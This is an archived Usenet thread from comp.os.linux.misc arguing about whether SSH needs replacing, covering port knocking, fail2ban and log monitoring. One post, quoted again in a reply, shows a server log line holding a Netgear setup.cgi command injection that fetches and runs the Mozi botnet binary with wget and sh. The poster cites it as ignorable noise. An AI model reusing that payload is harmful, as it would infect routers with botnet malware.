>>    "community effort" drawing from a lot of
>>    expertise and experience with broad agreement
>>    involved.
>>
>>    Or is all this already behind the curve ? SO much
>>    access is now via browser-based apps.
>>
>>    SolarWinds will sell you some great stuff ....
>>
>
> Just build a wrapper - a sort of modern inetd - that requires
> simultaneous access on three ports to open one of them to any service.

"Port knocking" and relatives are nothing new.
And yes, they WILL keep out the rabble, unless
the rabble is motivated to monitor every packet
coming in and out for days/weeks and the spend
a lot longer in analysis.

But every layer also adds "inconvenience" for
the legit users. They also need custom software
to, for example, light up the correct other
ports so they can access the real one.

Thing is, any human can, looking at the usual
kinds of logs, immediately spot an aggressor.
Computers normally don't see that however -
so perhaps a broader solution is to make it
so they CAN ... apply a little "AI" ... what
does an attack "look like" ?

> Proper packaged port knocker. Might already be one.

There are.

> SSH is a perfectly adequate protocol that only purists find inadequate.

Ten years ago I'd have agreed ... but now with massive
distributed attacks becoming the norm even for the script
kiddies ........

The inbuilt defenses of SSH just weren't made for those
sorts of attacks. You can add wrappers, then more wrappers,
until you have a fragile mess - but a ground-up replacement
seems "better" somehow.

And "security" is never "purist" ... it's VITAL.

Re: Is It Time To Replace SSH ???

<wwvfsddkllt.fsf@LkoBDZeT.terraraq.uk>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10993&group=comp.os.linux.misc#10993

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!aioe.org!nntp.terraraq.uk!.POSTED.tunnel.sfere.anjou.terraraq.org.uk!not-for-mail
From: invalid@invalid.invalid (Richard Kettlewell)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 11:16:46 +0000
Organization: terraraq NNTP server
Message-ID: <wwvfsddkllt.fsf@LkoBDZeT.terraraq.uk>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
<6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
<tnkjgv$3lupf$3@dont-email.me> <k07306F9603U1@mid.individual.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
Injection-Info: mantic.terraraq.uk; posting-host="tunnel.sfere.anjou.terraraq.org.uk:172.17.207.6";
logging-data="24855"; mail-complaints-to="usenet@mantic.terraraq.uk"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:pks+6bFgYNawVzgDjZkt7KXKkUg=
X-Face: h[Hh-7npe<<b4/eW[]sat,I3O`t8A`(ej.H!F4\8|;ih)`7{@:A~/j1}gTt4e7-n*F?.Rl^
F<\{jehn7.KrO{!7=:(@J~]<.[{>v9!1<qZY,{EJxg6?Er4Y7Ng2\Ft>Z&W?r\c.!4DXH5PWpga"ha
+r0NzP?vnz:e/knOY)PI-
X-Boydie: NO
 by: Richard Kettlewell - Sun, 18 Dec 2022 11:16 UTC

"Carlos E. R." <robin_listas@es.invalid> writes:
> On 17/12/2022 15.25, Rich wrote:
>> Please detail what your proposed 'smarter' ssh would do given this
>> situation.
>> And, while you are at it, please explain why this should be an
>> activity
>> that ssh concerns itself with (thereby adding significant complexity)
>> as opposed to this being a network monitoring layer, separate from ssh,
>> that monitors and remediates things on behalf of ssh and any other
>> services.
>
> Monitoring logs is a kludge.

If you want SSH to block attackers directly that would be a fairly
simple change to an SSH server. Designing a new secure remote login
protocol just for that would be a bizarre choice.

Personally I think the current architecture is a good example of
decoupling.

I can see a better argument for using PAM to trigger the blocking
(perhaps already possible with pam_exec). That would (in principle)
allow for uniform reporting from SSH, mosh, RDP, etc. Again, though, it
wouldn’t justify the OP’s requirement for a completely new protocol,
which still seems to lack any coherent motivation.

--
http://www.greenend.org.uk/rjk/

Re: Is It Time To Replace SSH ???

<tnmvgr$3v0v1$10@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10994&group=comp.os.linux.misc#10994

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: tnp@invalid.invalid (The Natural Philosopher)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 12:02:35 +0000
Organization: A little, after lunch
Lines: 38
Message-ID: <tnmvgr$3v0v1$10@dont-email.me>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
<6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
<tnkjgv$3lupf$3@dont-email.me> <k07306F9603U1@mid.individual.net>
<wwvfsddkllt.fsf@LkoBDZeT.terraraq.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Sun, 18 Dec 2022 12:02:35 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="4a77c7af8f35f4de0e8b483b6d12f7df";
logging-data="4162529"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1+8SwddvyD+p+AGTUnCz4mo5QJ9L2Nwor0="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.4.2
Cancel-Lock: sha1:9+o9Lx8I4+hIXFWTiC/tyxK9Ybw=
In-Reply-To: <wwvfsddkllt.fsf@LkoBDZeT.terraraq.uk>
Content-Language: en-GB
 by: The Natural Philosop - Sun, 18 Dec 2022 12:02 UTC

On 18/12/2022 11:16, Richard Kettlewell wrote:
> "Carlos E. R." <robin_listas@es.invalid> writes:
>> On 17/12/2022 15.25, Rich wrote:
>>> Please detail what your proposed 'smarter' ssh would do given this
>>> situation.
>>> And, while you are at it, please explain why this should be an
>>> activity
>>> that ssh concerns itself with (thereby adding significant complexity)
>>> as opposed to this being a network monitoring layer, separate from ssh,
>>> that monitors and remediates things on behalf of ssh and any other
>>> services.
>>
>> Monitoring logs is a kludge.
>
> If you want SSH to block attackers directly that would be a fairly
> simple change to an SSH server. Designing a new secure remote login
> protocol just for that would be a bizarre choice.
>
> Personally I think the current architecture is a good example of
> decoupling.
>
> I can see a better argument for using PAM to trigger the blocking
> (perhaps already possible with pam_exec). That would (in principle)
> allow for uniform reporting from SSH, mosh, RDP, etc. Again, though, it
> wouldn’t justify the OP’s requirement for a completely new protocol,
> which still seems to lack any coherent motivation.
>
He just likes 'new shiny thing, make everything better'
Creeping featurism as a substitute for genuine progress.

--
"Corbyn talks about equality, justice, opportunity, health care, peace,
community, compassion, investment, security, housing...."
"What kind of person is not interested in those things?"

"Jeremy Corbyn?"

Re: Is It Time To Replace SSH ???

<tnn44r$233i5$1@news1.tnib.de>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10996&group=comp.os.linux.misc#10996

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!rocksolid2!i2pn.org!weretis.net!feeder8.news.weretis.net!news1.tnib.de!feed.news.tnib.de!news.tnib.de!.POSTED.torres.zugschlus.de!not-for-mail
From: mh+usenetspam1118@zugschl.us (Marc Haber)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 14:21:30 +0100
Organization: private site, see http://www.zugschlus.de/ for details
Message-ID: <tnn44r$233i5$1@news1.tnib.de>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com> <tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de> <tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net> <tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk> <tnilb0$1qdhe$1@news1.tnib.de> <6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com> <tnkjgv$3lupf$3@dont-email.me> <k07306F9603U1@mid.individual.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Injection-Date: Sun, 18 Dec 2022 13:21:31 -0000 (UTC)
Injection-Info: news1.tnib.de; posting-host="torres.zugschlus.de:85.214.160.151";
logging-data="2199109"; mail-complaints-to="abuse@tnib.de"
X-Newsreader: Forte Agent 6.00/32.1186
 by: Marc Haber - Sun, 18 Dec 2022 13:21 UTC

"Carlos E. R." <robin_listas@es.invalid> wrote:
>Monitoring logs is a kludge.

Right, ssh and services should have hooks for that. Sadly, for ssh,
this is regularly bludgeoned down by upstream if requested.

Greetings
Marc
--
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber | " Questions are the | Mailadresse im Header
Mannheim, Germany | Beginning of Wisdom " |
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

Re: Is It Time To Replace SSH ???

<k09itbFkg77U1@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=10999&group=comp.os.linux.misc#10999

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!news.swapon.de!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: robin_listas@es.invalid (Carlos E. R.)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 23:35:23 +0100
Lines: 27
Message-ID: <k09itbFkg77U1@mid.individual.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de> <op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de> <k05oagF35vsU2@mid.individual.net>
<875ye9v7ho.fsf@usenet.ankman.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: individual.net Yt/q09sbJl0/dohEfTrWOQjKSBE0OwM8DWeX7aIIUphqdJngRb
Cancel-Lock: sha1:fBijDIvajTY3J8GkxW8rwdbiM1A=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.5.1
Content-Language: es-ES, en-CA
In-Reply-To: <875ye9v7ho.fsf@usenet.ankman.de>
 by: Carlos E. R. - Sun, 18 Dec 2022 22:35 UTC

On 18/12/2022 02.13, Andreas Kohlbach wrote:
> On Sat, 17 Dec 2022 12:43:12 +0100, Carlos E. R. wrote:
>>
>> On 17/12/2022 09.47, Andreas Kohlbach wrote:
>>> On Sat, 17 Dec 2022 02:03:27 -0500, David W. Hodgins wrote:
>>>>
>>>>> I don't think so. Unless being DDoSed. But then you have to take a
>>>>> completely different approach to mitigate the traffic.
>>>>
>>>> I don't block, but I use a non-standard port. Otherwise failed attempts
>>>> can fill the filesystem where the logs are stored. I had that happen before
>>>> I switched ports.
>>> There's logrotate to take care of logfile sizes.
>>
>> That's not the issue.
>>
>> The issue is so much noise that something important will be missed.
>
> I was referring to "can fill the filesystem".

Yes, rotating logs takes care of that. But the issue of too much noise
remains.

--
Cheers,
Carlos E.R.

Re: Is It Time To Replace SSH ???

<87sfhcs29e.fsf@usenet.ankman.de>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=11001&group=comp.os.linux.misc#11001

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: ank@spamfence.net (Andreas Kohlbach)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Sun, 18 Dec 2022 18:47:25 -0500
Organization: A noiseless patient Spider
Lines: 25
Message-ID: <87sfhcs29e.fsf@usenet.ankman.de>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de>
<op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de> <k05oagF35vsU2@mid.individual.net>
<875ye9v7ho.fsf@usenet.ankman.de> <k09itbFkg77U1@mid.individual.net>
MIME-Version: 1.0
Content-Type: text/plain
Injection-Info: reader01.eternal-september.org; posting-host="a1e7a317860066575396afa2fe8c7959";
logging-data="88247"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/8/X+9dy5CB5lDNy8Cf6p+"
User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)
Cancel-Lock: sha1:LISSFbgB9lHHrBLXshPmBzv3U6w=
sha1:rYrWFv508pvSoxuX9ngCWDhfQkE=
X-No-Archive: Yes
 by: Andreas Kohlbach - Sun, 18 Dec 2022 23:47 UTC

On Sun, 18 Dec 2022 23:35:23 +0100, Carlos E. R. wrote:
>
> On 18/12/2022 02.13, Andreas Kohlbach wrote:
>>
>> I was referring to "can fill the filesystem".
>
> Yes, rotating logs takes care of that. But the issue of too much noise
> remains.

The typical Linux user of today can ignore the noise. Ignore your logs,
unless you feel something is not right.

Same with (my) web server. Again, I do not offer a commercial
service. Thus I not often look into the logs and let logrotate taking
care of compressing and later get rid of logs.

Ever so often I check for "200 " to see who had success, and shuckle
about things like

190.180.154.158 - - [18/Dec/2022:12:02:10 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://190.180.154.158:38147/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 341 "-" "-"

in the log. Yes, I could block 190.180.154.158 or a netblock around
it. But why? It's just noise I choose to ignore.
--
Andreas

Re: Is It Time To Replace SSH ???

<k09nr5Fkg77U2@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=11002&group=comp.os.linux.misc#11002

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.goja.nl.eu.org!3.eu.feeder.erje.net!feeder.erje.net!news.szaf.org!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: robin_listas@es.invalid (Carlos E. R.)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Mon, 19 Dec 2022 00:59:33 +0100
Lines: 35
Message-ID: <k09nr5Fkg77U2@mid.individual.net>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<87mt7mwyvl.fsf@usenet.ankman.de> <op.1xa671jca3w0dxdave@hodgins.homeip.net>
<871qoywh67.fsf@usenet.ankman.de> <k05oagF35vsU2@mid.individual.net>
<875ye9v7ho.fsf@usenet.ankman.de> <k09itbFkg77U1@mid.individual.net>
<87sfhcs29e.fsf@usenet.ankman.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
X-Trace: individual.net pB5MQYuJieOVwYmiUk1Ldw3nDAbf1UL9zUKs6XXam7w6+x4CB8
Cancel-Lock: sha1:HWm7JK2rKrAtp9HGjijiNKBKE9o=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Thunderbird/102.5.1
Content-Language: es-ES, en-CA
In-Reply-To: <87sfhcs29e.fsf@usenet.ankman.de>
 by: Carlos E. R. - Sun, 18 Dec 2022 23:59 UTC

On 19/12/2022 00.47, Andreas Kohlbach wrote:
> On Sun, 18 Dec 2022 23:35:23 +0100, Carlos E. R. wrote:
>>
>> On 18/12/2022 02.13, Andreas Kohlbach wrote:
>>>
>>> I was referring to "can fill the filesystem".
>>
>> Yes, rotating logs takes care of that. But the issue of too much noise
>> remains.
>
> The typical Linux user of today can ignore the noise. Ignore your logs,
> unless you feel something is not right.

I work the other way:
I check the logs to see if there is something wrong :-)

> Same with (my) web server. Again, I do not offer a commercial
> service. Thus I not often look into the logs and let logrotate taking
> care of compressing and later get rid of logs.
>
> Ever so often I check for "200 " to see who had success, and shuckle
> about things like
>
> 190.180.154.158 - - [18/Dec/2022:12:02:10 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://190.180.154.158:38147/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 341 "-" "-"
>
> in the log. Yes, I could block 190.180.154.158 or a netblock around
> it. But why? It's just noise I choose to ignore.

Each one has their methods :-)

--
Cheers,
Carlos E.R.

Re: Is It Time To Replace SSH ???

<20221219000944@news.eternal-september.org>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=11003&group=comp.os.linux.misc#11003

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader01.eternal-september.org!.POSTED!not-for-mail
From: rogblake@iname.invalid (Roger Blake)
Newsgroups: comp.os.linux.misc
Subject: Re: Is It Time To Replace SSH ???
Date: Mon, 19 Dec 2022 00:12:43 -0000 (UTC)
Organization: Ministry of Silly Walks
Lines: 15
Message-ID: <20221219000944@news.eternal-september.org>
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<wwvcz8ljc0x.fsf@LkoBDZeT.terraraq.uk> <tnernt$32eg3$9@dont-email.me>
<87tu1wxmwi.fsf@usenet.ankman.de> <tnhd6q$3bglv$1@dont-email.me>
Injection-Date: Mon, 19 Dec 2022 00:12:43 -0000 (UTC)
Injection-Info: reader01.eternal-september.org; posting-host="366adf3ff31178fa1415634bc47bb45b";
logging-data="92666"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19C2iPVrfkjKHyIJ7gG/HRyWxX2uMzEHfA="
User-Agent: slrn/1.0.3 (Patched for libcanlock3) (NetBSD)
Cancel-Lock: sha1:y6yV97NlhjrcTxNNmLrQ8S5HyvY=
 by: Roger Blake - Mon, 19 Dec 2022 00:12 UTC

On 2022-12-16, The Natural Philosopher <tnp@invalid.invalid> wrote:
> Block that proxy's public IP address, you block yourself from using it
> ever again.

There are programs such as fail2ban which let you set a timeout after
which a blocked IP address will be unblocked.

--
------------------------------------------------------------------------------
18 Reasons I won't be vaccinated -- https://tinyurl.com/ebty2dx3
Covid vaccines: experimental biology -- https://tinyurl.com/57mncfm5
The fraud of "Climate Change" -- https://RealClimateScience.com
There is no "climate crisis" -- https://climatedepot.com
Don't talk to cops! -- https://DontTalkToCops.com
------------------------------------------------------------------------------

Re: Is It Time To Replace SSH ???

<gXWdnbX9bNyOWAL-nZ2dnZfqn_qdnZ2d@earthlink.com>

  copy mid

https://www.rocksolidbbs.com/computers/article-flat.php?id=11007&group=comp.os.linux.misc#11007

  copy link   Newsgroups: comp.os.linux.misc
Path: i2pn2.org!i2pn.org!usenet.blueworldhosting.com!feed1.usenet.blueworldhosting.com!peer01.iad!feed-me.highwinds-media.com!news.highwinds-media.com!border-1.nntp.ord.giganews.com!nntp.giganews.com!Xl.tags.giganews.com!local-2.nntp.ord.giganews.com!nntp.earthlink.com!news.earthlink.com.POSTED!not-for-mail
NNTP-Posting-Date: Mon, 19 Dec 2022 01:57:38 +0000
Subject: Re: Is It Time To Replace SSH ???
Newsgroups: comp.os.linux.misc
References: <y-ycndVmEZmnWQf-nZ2dnZfqn_WdnZ2d@earthlink.com>
<tnfk1k$344am$3@dont-email.me> <87r0x0xmre.fsf@usenet.ankman.de>
<tnhd9l$3bglv$2@dont-email.me> <k02s5aFjp4fU2@mid.individual.net>
<tnhea9$3bglv$10@dont-email.me> <wwvbko3jj7p.fsf@LkoBDZeT.terraraq.uk>
<tnilb0$1qdhe$1@news1.tnib.de>
<6sScnWpDiqXc7QD-nZ2dnZfqnPGdnZ2d@earthlink.com>
<tnkjgv$3lupf$3@dont-email.me> <k07306F9603U1@mid.individual.net>
<wwvfsddkllt.fsf@LkoBDZeT.terraraq.uk> <tnmvgr$3v0v1$10@dont-email.me>
From: 26C.Z969@noaada.net (26C.Z969)
Date: Sun, 18 Dec 2022 20:57:20 -0500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Thunderbird/78.13.0
MIME-Version: 1.0
In-Reply-To: <tnmvgr$3v0v1$10@dont-email.me>
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Message-ID: <gXWdnbX9bNyOWAL-nZ2dnZfqn_qdnZ2d@earthlink.com>
Lines: 61
X-Usenet-Provider: http://www.giganews.com
NNTP-Posting-Host: 68.222.41.46
X-Trace: sv3-ZGYx43gAuhL/92Kphe7rxoBtmbIVY/iDFoFS2XmF3LxXEScTNba8nG4ruIPwhKGBU7eNZYnKfZpY6iq!nPnTsv3kysFD/8dfmPdRagPWNXbT2khY53DhdKuT7GMk+/vRNdIJATdaW7tNY/0lEQrIX0HQZeUQ!SsRbCj2xFuqZqYiXijk=
X-Abuse-and-DMCA-Info: Please be sure to forward a copy of ALL headers
X-Abuse-and-DMCA-Info: Otherwise we will be unable to process your complaint properly
X-Postfilter: 1.3.40
X-Received-Bytes: 4248
 by: 26C.Z969 - Mon, 19 Dec 2022 01:57 UTC

On 12/18/22 7:02 AM, The Natural Philosopher wrote:
> On 18/12/2022 11:16, Richard Kettlewell wrote:
>> "Carlos E. R." <robin_listas@es.invalid> writes:
>>> On 17/12/2022 15.25, Rich wrote:
>>>> Please detail what your proposed 'smarter' ssh would do given this
>>>> situation.
>>>> And, while you are at it, please explain why this should be an
>>>> activity
>>>> that ssh concerns itself with (thereby adding significant complexity)
>>>> as opposed to this being a network monitoring layer, separate from ssh,
>>>> that monitors and remediates things on behalf of ssh and any other
>>>> services.
>>>
>>> Monitoring logs is a kludge.
>>
>> If you want SSH to block attackers directly that would be a fairly
>> simple change to an SSH server. Designing a new secure remote login
>> protocol just for that would be a bizarre choice.
>>
>> Personally I think the current architecture is a good example of
>> decoupling.
>>
>> I can see a better argument for using PAM to trigger the blocking
>> (perhaps already possible with pam_exec). That would (in principle)
>> allow for uniform reporting from SSH, mosh, RDP, etc. Again, though, it
>> wouldn’t justify the OP’s requirement for a completely new protocol,
>> which still seems to lack any coherent motivation.
>>
> He just likes 'new shiny thing, make everything better'
> Creeping featurism as a substitute for genuine progress.

Ain't gonna be any "genuine progress" using todays
SSH.

All I did here was ASK A QUESTION ... "Is SSH good
enough anymore ?".

And I still don't think so.

World's changed. Change with it or be eaten.

There are MUCH better programmers out there than
myself with a LOT more nuanced experience dealing
with net security problems. Time for some of them
to cast an eye on this. Sure, I can break out the
'C' compiler and write an internet service BUT
there are so many facets to writing a "better SSH"
that'll cope with all the challenges ... I just
ain't the guy. This will take a little "AI" and
that's not my strong suite.

Even the stupidist, brute force, distributed attack
amounts to "denial of service". All yer password
and port-knocking trix won't help much there. Not
entirely sure if that can be dealt with ON *YOUR* BOX,
but maybe. I'm hoping distributed attacks show a
*pattern* that 'AI' can recognize and filter ... and
pass "likely-abused IP addresses" to an online DB in
the same fashion as e-mail blacklists. That's IQ
which grows.


computers / comp.os.linux.misc / Re: Is It Time To Replace SSH ???

Pages:123456
server_pubkey.txt

rocksolid light 0.9.81
clearnet tor